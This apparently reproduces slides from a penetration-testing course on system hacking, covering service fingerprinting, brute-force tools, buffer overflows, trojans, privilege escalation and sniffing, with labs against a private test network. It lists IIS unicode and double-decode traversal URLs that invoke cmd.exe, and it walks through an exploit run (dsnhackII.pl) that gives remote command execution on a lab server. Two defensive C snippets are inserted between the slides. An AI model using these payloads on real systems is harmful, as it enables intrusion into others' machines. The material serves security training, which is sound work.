Title: System Hacking
Slide 1: System Hacking
Slide 2: Outline
- Service identification
- Vulnerability identification and research
- Exploits
- Putting it all together
- Target selection in large networks
- Using automated tools
Slide 3: Service Identification
Slide 4: Service Identification
- Common ports
- Banners
- Fingerprinting
Slide 5: Connecting to ports
- Telnet or netcat is the best way to connect to ports
- Many services may be accessed directly
Slide 6: Common ports
Many services can be identified by their common port numbers
Slide 7: Zone-h.org
Slide 8: Alldas.de
Slide 9: Banners
- Some services may be better identified by banners
- telnet on routers (2001, 4001, 6001)
- Web daemons for applications
- Compaq Insight Manager
- Many systems include web configuration interfaces
Slide 10: Banners
Slide 11: Fingerprinting
- Some services cannot be clearly identified just by connecting to them
- Netbus on NT uses the same port as an RPC service on Solaris
- Some database connections do not provide an automatic response
- Fingerprinting a service may identify what it is, even if it has moved ports
Slide 12: Fingerprinting
Slide 13: Vulnerability Research
Slide 14: Vulnerability identification and research
- This is the process of mapping identified security attributes of a system or application to potential vulnerabilities
- Several methods to map vulnerabilities
- Manually map identified systems against publicly available databases such as www.securityfocus.com, www.cert.org and vendor security alerts
- Use public exploit code posted to various security mailing lists and hacker websites, or write your own code
- Use automated vulnerability scanning tools such as Nessus, ISS or whisker
Slide 15: Vulnerability research
Slide 16: Lab
- Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified.
- www.securityfocus.com
- General searches on google.com
- www.packetstormsecurity.com
- www.astalavista.box.sk
- www.securiteam.com
- Time: 30 minutes
Slide 17: Exploits
Slide 18: Types of exploits
- Remote exploits
- Trojans
- Privilege escalation
Slide 19: Remote Exploits
Slide 20: Remote exploits
- A remote exploit attempts to gain access across the network and without proper authentication.
- Examples
- Brute force authentication attempts
- Attacks bypassing integrity checkers
- Buffer overflows
- Sniffing (to some extent)
Slide 21: Brute force attacks
- Most common services attacked
- Telnet
- FTP
- R commands
- Secure Shell
- SNMP community names
- Post Office Protocol (POP)
- HyperText Transport Protocol (HTTP/HTTPS)
- SMB
Slide 22: Common Tools used
- Brutus
- Admsnmp
- Admsmb
- TeeNet
- Pwscan.pl
- Thc_hydra
Slide 23: Remote password guessing
- Attempting to connect to an enumerated share such as ADMIN$ or C$ and trying username/password combinations until one works
- A null session can be established with the target to obtain valid account names
- Use an automated password guessing tool to brute force the selected shares.
Slide 24: Brute force attacks under Windows
- Some common services prone to brute-force
- Web
- Netbios
- FTP
Slide 26: Legion
Slide 27: Brute force attacks under Unix
- Some common services prone to brute-force
- telnet
- Ssh
- Web
- FTP
- R-commands
Slide 28: Lab
- Use a Netbios scanning tool to identify local shares on this network
- Use a brute force tool to attempt access to an account on 10.0.1.120
- Warning! These tools can produce significant traffic and lock accounts.
- Time: 30 minutes
Slide 29: Buffer overflow attacks
- FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from
- LOUD-FAT-BLOKE
- Stack overflows
- Format string overflows
- Heap overflows
- Overflow subverting the control path
Slide 30: Buffer overflow attacks
Slide 31: Buffer overflow attacks
- Occurs when a user or process attempts to place more data into a buffer than was originally allocated
- Commonly associated with C functions like strcpy(), strcat(), sprintf() etc.
- Most frequently found where user input is taken and passed into an application
Slide 32: Windows buffer overflows
- Only a few conditions have been revealed to date
- All of them exploited flaws in application programs
- Very common for DoS attacks
- Exploits
- Netmeeting 2.x by Cult of the Dead Cow
- NT RAS by Cerberus Information Security
- Winhlp32 by Cerberus Information Security
- IISHack by eEye
- Oracle Web Listener 4.0 by CIS
- Outlook GMT token overrun by Underground Security Systems Research
- IIS .printer
Slide 33: Unix buffer overflows
Slide 34: Unexpected input
- Bypassing integrity checks
- Gaining access by providing unexpected input
- IIS unicode
- Web applications
Slide 35: Format string attacks
- Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf()
- Efforts usually focused on SUID root programs
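The overflow and format-string defects these slides attribute to strcpy(), sprintf() and printf(), as an added C example that is not from the course or from any program it names: the unsafe pattern beside a hardened version that rejects over-long input and never passes user data as a format string. `greet_unsafe`, `greet_safe` and the 16-byte `NAME_MAX` are illustrative names and sizes.

```c
#include <stdio.h>
#include <string.h>

#define NAME_MAX 16   /* fixed-size buffer; illustrative size */

/* BEFORE: the pattern the slides describe. strcpy() and sprintf() copy
 * until the source ends, so a name of 16 or more bytes runs past name[]
 * into adjacent stack memory, and passing user data as the format
 * argument of printf() lets any % directives in it read off the stack. */
void greet_unsafe(const char *user)
{
    char name[NAME_MAX];
    char line[64];
    strcpy(name, user);                  /* unbounded copy */
    sprintf(line, "Welcome %s\n", name); /* unbounded formatted write */
    printf(line);                        /* user-controlled format string */
}

/* AFTER: treat over-long input as invalid (input validation), bound every
 * write, and keep user data out of the format-string position.
 * Writes the greeting into out; returns 0 on success, -1 if rejected. */
int greet_safe(const char *user, char *out, size_t outcap)
{
    char name[NAME_MAX];
    /* memchr() looks at most NAME_MAX bytes: no terminator there means the
     * input cannot fit, so it is rejected rather than silently truncated. */
    const char *end = memchr(user, '\0', NAME_MAX);
    if (end == NULL)
        return -1;
    memcpy(name, user, (size_t)(end - user) + 1);

    int w = snprintf(out, outcap, "Welcome %s\n", name);
    if (w < 0 || (size_t)w >= outcap)
        return -1;                       /* output would have been truncated */
    fputs(out, stdout);                  /* data path only, never a format */
    return 0;
}

int main(void)
{
    char out[64];
    greet_safe("alice", out, sizeof out);                    /* accepted */
    if (greet_safe("a_name_far_longer_than_the_buffer", out, sizeof out) != 0)
        puts("rejected over-long name");
    return 0;
}
```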
Slide 36: Input validation attacks
- Occurs when a program fails to recognise syntactically incorrect input
- Occurs when a module accepts extraneous input
- Occurs when a module fails to handle missing input fields
- A field-value correlation error occurs
- Common in web applications
Slide 37: IIS vulnerabilities
- Unicode and URL based attacks
- Special tags in HTTP
- Sample scripts to brute force
Slide 38: IIS hacking
- /scripts/root.exe?/cdir
- /MSADC/root.exe?/cdir
- /c/winnt/system32/cmd.exe?/cdir
- /d/winnt/system32/cmd.exe?/cdir
- /scripts/..255c../winnt/system32/cmd.exe?/cdir
- /_vti_bin/..255c../..255c../..255c../winnt/system32/cmd.exe?/cdir
- /_mem_bin/..255c../..255c../..255c../winnt/system32/cmd.exe?/cdir
- /msadc/..255c../..255c../..255c/..c11c../..c11c../..c11c../winnt/system32/cmd.exe?/cdir
- /scripts/..c11c../winnt/system32/cmd.exe?/cdir
- /scripts/..c02f../winnt/system32/cmd.exe?/cdir
- /scripts/..c0af../winnt/system32/cmd.exe?/cdir
- /scripts/..c19c../winnt/system32/cmd.exe?/cdir
- /scripts/..3563../winnt/system32/cmd.exe?/cdir
- /scripts/..35c../winnt/system32/cmd.exe?/cdir
- /scripts/..253563../winnt/system32/cmd.exe?/cdir
- /scripts/..252f../winnt/system32/cmd.exe?/cdir
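A defender-side canonicalisation check for the two IIS decoding bugs the URLs above exercise (overlong UTF-8 "unicode" sequences and double percent-decoding), as an added C example that is not part of the course material: it decodes a request path the way a permissive decoder of that era did and then looks for a `..` segment in the result, because filtering the raw request for `../` misses every variant in the list. The function names and the 0xC0/0xC1 lead-byte model of the decoder are this example's own assumptions.

```c
#include <string.h>
#include <ctype.h>
static int hexval(unsigned char c)    /* value of a hex digit, or -1 */
{
    return isdigit(c) ? c - '0' : isxdigit(c) ? tolower(c) - 'a' + 10 : -1;
}
/* One %XX pass from in to out (cap bytes); malformed escapes pass through. */
static void pct_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < cap; i++) {
        int h = in[i] == '%' ? hexval((unsigned char)in[i + 1]) : -1;
        int l = h >= 0 ? hexval((unsigned char)in[i + 2]) : -1;
        if (l >= 0) {
            out[o++] = (char)(h * 16 + l);
            i += 2;
        } else
            out[o++] = in[i];
    }
    out[o] = '\0';
}
/* Permissive-decoder model: a 0xC0/0xC1 lead byte and the next byte fold into
 * one ASCII byte with no shortest-form or continuation check, which is what
 * turned %c0%af into '/' and %c1%1c into '\'. Rewrites s in place. */
static void fold_overlong(char *s)
{
    size_t o = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];
        if ((c == 0xC0 || c == 0xC1) && s[i + 1] != '\0')
            s[o++] = (char)(((c & 0x1F) << 6) | ((unsigned char)s[++i] & 0x3F));
        else
            s[o++] = s[i];
    }
    s[o] = '\0';
}
/* 1 if the canonical form of url contains a "../" or "..\" segment, i.e. the
 * request would escape the web root after the server's own decoding. */
int escapes_webroot(const char *url)
{
    char a[512], b[512];
    pct_decode(url, a, sizeof a);   /* first pass: %25 -> '%', %c0 -> 0xC0 */
    fold_overlong(a);
    pct_decode(a, b, sizeof b);     /* second pass: %255c -> %5c -> '\' */
    fold_overlong(b);
    for (const char *p = b; (p = strstr(p, "..")) != NULL; p += 2)
        if (p[2] == '/' || p[2] == '\\')
            return 1;
    return 0;
}
```

Run it over the request path of each web log entry: the constructed sample `/scripts/..%c0%af../outside.txt` returns 1, while `/scripts/samples/details.idc` and a legitimately encoded path such as `/docs/caf%C3%A9/index.html` return 0.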
Slide 39: Lab
- Use the provided URLs to roam the filesystem of 10.0.1.120
- What is accessible and what is not?
- Time: 10 minutes
Slide 40: Trojan Horses and Backdoors
Slide 41: Windows trojans and backdoors
- These programs provide unauthorised access to a system without the user's knowledge
- Theef
- CDC BackOrifice
- SubSeven
- Moosucker
- A great site: http://www.tlsecurity.net
Slide 42: Tlsecurity.net
Slide 43: Privilege Escalation
Slide 44: Privilege escalation
- Attack used to move from normal user to superuser
- Quest for Administrator
- Quest for root
Slide 45: Quest for Administrator
- Hoovering information
- Getadmin
- Sechole
- Spoofing LPC Port requests
Slide 46: Hoovering information
- Identify further information that will gain higher privileges
- Srvinfo
- Find utility
- regdmp
Slide 47: Getadmin
- Windows NT 4
- Small program written by Konstantin Sobolev
- Adds users to the local admin group
- Hijacks a process called winlogon
- Patched by NT SP3
Slide 48: Sechole
- Similar functionality to getadmin
- Modifies instructions in the memory of the OpenProcess API
- Possible to launch remotely if IIS is running
- Patched by NT SP6a
Slide 49: Spoofing LPC Port Requests
- Vulnerability identified by The RAZOR Team at http://razor.bindview.com
- The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API
Slide 50: Quest for root
- Local buffer overflow
- Symlink
- File Descriptor attacks
- Signal handling
- Core-file manipulation
- Shared libraries
- Kernel flaws
- System misconfiguration
- IFS attacks
Slide 51: Local buffer overflow
- Mostly used to exploit SUID root programs
- May add username to password file
Slide 52: Sniffing
Slide 53: Sniffing
- Sniffing works by setting a network card to promiscuous mode
- Sniffing only works on traffic travelling across the local network
- Sniffing is greatly complicated by network switches
Slide 54: Windows password sniffing
- Can use any ordinary packet analyser
- Or use a specialised tool such as l0phtcrack
- Some susceptible services
- Netbios
- FTP
- Web (especially cookies)
Slide 55: Windows password sniffing
Slide 56: Unix password sniffing
- Can use any ordinary packet analyser
- But Unix has some great sniffers such as dsniff
- Many Unix programs send passwords in clear text
- Some susceptible services
- Telnet
- FTP
- Web
Slide 57: dsniff
- Netbios
- ftp
- telnet
- R-commands
- http
- Instant messaging
- And much much more!
Slide 58: NT services
Slide 59: Common NT services
Slide 60: Profile Netbios
- Ports 135-139
- Susceptible to sniffing, brute force
- Scanners available to search for shares
- Can give access to system registry
- Normally blocked at routers due to broadcast
Slide 61: Profile Web
- Port 80, or any for special apps
- Common servers: Apache, Oracle, IIS, Cold Fusion
- Very susceptible to DoS attacks
- Often give read access to all files
- IIS vulnerabilities are legendary
Slide 62: Profile SMTP
- Port 25
- Very susceptible to mail relay
- Not a lot else
Slide 63: Profile FTP
- Port 21
- Part of IIS distribution
- Some vulnerabilities but not a large target
Slide 64: Profile databases
- Ports 1433, 1510, 1725
- MSSql is a good internal network target
- MS and Oracle often set with default passwords
- SQL injection a favourite for web hackers
Slide 65: Unix services
Slide 66: Profile SNMP
- Ports 160, 161 UDP
- SNMP has two default passwords: public, private
- Tools such as snmpwalk good for enumerating entries
Slide 67: Profile TFTP
- Port 69
- Typically used to boot diskless workstations or network devices such as routers
- No username or password
- Good for sending around files from hacked systems
Slide 68: Profile FTP
- Ports 20, 21
- Allows upload and download of files from a remote system
- Many ftp servers allow anonymous access
- May be vulnerable to buffer overflow
- Can also be used for bounce attacks
Slide 69: Profile Sendmail
- Port 25
- Mail transfer agent used on many Unix systems
- Can be used to identify accounts via the vrfy and expn commands
- Some versions susceptible to denial of service and buffer overflows
- Long list of vulnerabilities
Slide 70: Profile RPC
- Remote Procedure Call
- Allows a program on one computer to execute code on a remote system
Slide 71: Profile Web
- Port 80
- Apache is most common
- Not as many attacks as IIS
- Always check URLs for embedded commands
Slide 72: Identifying targets in large networks
Slide 73: Target selection
- Scan for specific services
- Database (MS, Oracle, Sybase)
- Web
- RPC
- R-commands
- View Netbios browse lists to make way to PDC/server
- View Netbios browse lists to identify treasury, etc.
Slide 74: Automated vulnerability scanning tools
Slide 75: Example automated applications
- Grinder
- SiteScan
- Whisker
- Twwscan
- Nessus
- Elza scriptable web client
Slide 76: whisker
Slide 77: Nessus
Slide 78: Conclusion
- Hackers often search for specific known vulnerabilities and avoid well-secured systems
- Free tools make it simple to gain unauthorised access to some systems
- Tools such as Nessus should be used by every security professional
Slide 79: Putting it all together
Slide 80: Our Configuration for today
For the purpose of the presentation, we will not perform our tests over the internet. But we won't cheat by cutting out the firewall.
Network diagram (labels recovered from the slide):
- Webserver: Internal 10.0.1.120, External 10.0.0.120
- TCP 80 only
- Firewall: 10.0.0.125 / 10.0.1.125
- Router
Slide 81: Network Penetration Tests
Slide 82: Identifying firewall Strategy
- Identify the Web or Mail server
- Get the Next-Hop before this
- This will probably be the perimeter router or the firewall
- Firewall 1, NetScreen appear as a hop
- PIX does not appear as a hop (flattens the network)
- 80% chance that it will be NetScreen, PIX or Firewall 1
- To figure out which:
- ICMP (i.e. Address Mask Request/Response headers)
- Use TCP stack fingerprinting
- Key ports (258, 259, 263 could be Firewall 1)
- IPSEC
- BUT luckily these days the tools are pre-written
Slide 83: Identifying the Firewall - Traceroute
    [root@wireless root]# traceroute 10.0.0.120
    traceroute to 10.0.0.120 (10.0.0.120), 30 hops max, 38 byte packets
     1
     2
UDP being blocked. Need another tool.
Slide 84: Identifying the Firewall - LFT
    lft -vv E -n 10.0.0.120
    Looks like we made it. Everyone responded. Moving on...
    Will finish TWO. Concluding with 2 hops.
    TTL LFT trace to 10.0.0.120:80/tcp
    4.2 BSD bug: next gateway may errantly reply with reused TTLs
     1 [target] 10.0.0.120:80 6.5ms
    4.2 BSD bug: next gateway may errantly reply with reused TTLs
     2 [target] 10.0.0.120:80 1.6ms
Suggests something between us. A firewall perhaps?
Could also use MPTraceroute.
Slide 85: Accessible hosts sweep for the firewall
    nmap -sP -n 10.0.0.
    Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
    Host (10.0.0.120) appears to be up.
    Host (10.0.0.121) appears to be down.
    Host (10.0.0.122) appears to be down.
    Host (10.0.0.123) appears to be down.
    Host (10.0.0.124) appears to be down.
    Host (10.0.0.125) appears to be up.
    Host (10.0.0.255) appears to be down.
    Nmap run completed -- 256 IP addresses (2 hosts up) scanned in 35 seconds
10.0.0.120: our web server
10.0.0.125: who's this?
Slide 86: Identifying the perimeter - Ike-scan
    ike-scan -v 10.0.0.125
    Starting ike-scan 1.6 with 1 hosts
    --- Pass 1 of 3 completed ---
    --- Pass 2 of 3 completed ---
    --- Pass 3 of 3 completed ---
    Ending ike-scan 1.6: 1 hosts scanned in 22.595 seconds (0.04 hosts/sec).
    0 returned handshake; 0 returned notify
Slide 87: Identifying the Firewall - conclusion
    ping 10.0.0.120
    PING 10.0.0.120 56(84) bytes of data.
    64 bytes from 10.0.0.120: icmp_seq=1 ttl=128 time=0.280 ms
    --- 10.0.0.120 ping statistics ---
    2 packets transmitted, 2 received, 0% loss

    ping -v -R 10.0.0.120
    PING 10.0.0.120 56(124) bytes of data.
    --- 10.0.0.120 ping statistics ---
    6 packets transmitted, 0 received, 100% loss
Windows!!
With low-level packet inspection? I think not!!
Slide 88: Identifying the Firewall - Icmp processing
    ping -v -T tsandaddr 10.0.0.120
    PING 10.0.0.120 (10.0.0.120) from 10.0.0.1: 56(124) bytes of data.
    --- 10.0.0.120 ping statistics ---
    16 packets transmitted, 0 received, 100% loss

    ping -v -T tsandaddr 10.0.0.125
    PING 10.0.0.125 (10.0.0.125) from 10.0.0.1: 56(124) bytes of data.
    --- 10.0.0.125 ping statistics ---
    8 packets transmitted, 0 received, 100% loss
Slide 89: Identifying the Firewall - Conclusion
- We suspect there is a firewall
- We know the web server is Windows
- But Windows is not normally capable of manipulating packets to this extent
- We are fairly sure that it isn't Firewall 1
- Let's see if we can hack into the servers
Slide 90: Hacking the other address - 10.0.0.125
Slide 91: Scanning 10.0.0.125
    nmap -sS -n -p 1-10000 10.0.0.125
    Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
    All 10000 scanned ports on 10.0.0.125 are: filtered
    Nmap run completed -- 1 IP address (1 host up)

    nmap -sU -n -p 1-10000 10.0.0.125
    Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
    All 10000 scanned ports on 10.0.0.125 are: filtered
    Nmap run completed -- 1 IP address (1 host up)
Nothing to hack
Slide 92: Hacking the web server
Slide 93: Hacking the web server
- Scan TCP ports
- Scan UDP ports
- !!! Only HTTP or HTTPS ports should be visible
- Run CGI scanner (i.e. Whisker, Crazymad or Nikto) to look for web server exploits
- Check scanner results
- Identify exploits
Slide 94: Hacking the web server - Scan UDP ports
    nmap -sU -n -p 1-10000 10.0.0.120
    Starting nmap 3.48
    All 10000 scanned ports on 10.0.0.120 are: filtered
    Nmap run completed -- 1 IP address (1 host up) scanned in 623.296 seconds
Nothing to hack
Slide 95: Hacking the web server - Scan TCP ports
    nmap -sS -n -O -p 1-1024 10.0.0.120
    Interesting ports on 10.0.0.120:
    (The 1023 ports scanned but not shown below are in state: filtered)
    PORT   STATE SERVICE
    80/tcp open  http
    Running (JUST GUESSING): Cisco PIX OS 6.X (88%)
    Aggressive OS guesses: Cisco PIX 501 running 6.x
    No exact OS matches for host.

    Nmap completed -- 1 IP address (1 host up)
HTTP - the only port to hack
Now we know
Slide 96: Hacking the web server - Run CGI scanner
    ./whisker.pl -h 10.0.0.120
    -- whisker / v1.4.0 / rain forest puppy
    Host: 10.0.0.120
    Server: Microsoft-IIS/4.0
    200 OK (IDC error): GET /scripts/samples/details.idc
    200 OK (IDC error): GET /scripts/samples/ctguestb.idc
    200 OK: HEAD /scripts/tools/newdsn.exe
      this can be used to make DSNs, useful in use with our ODBC exploit
      and the RDS exploit (with msadcs.dll)
    [root@wireless v1.4]# exit
Slide 97: Hacking the web server - Analysing CGI scanner results
Slide 98: Hacking the web server - Analysing CGI scanner results
Slide 99: Hacking the web server - Analysing CGI scanner results
Slide 100: Run exploit identified by scanner
    dsnhackII.pl -c -h 10.0.0.120
    NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
    Checking for necessary files:
    Checking for newdsn.exe -- Found :)
    Checking for ctguestb.idc -- Found :)
    Checking for details.idc -- Found :)
    Now trying to create "Web SQL" DSN... <success>
    Initializing GuestBook by GETting ctguestb.idc
    Type the command line you want to run (cmd /c assumed):
    cmd /c dir >> ..\hamster
    Now trying to execute command... <success>
    [root@wireless root]#
Slide 101: Lab
- Attack the systems provided and attempt to get command line access to NT
- Time: 45 minutes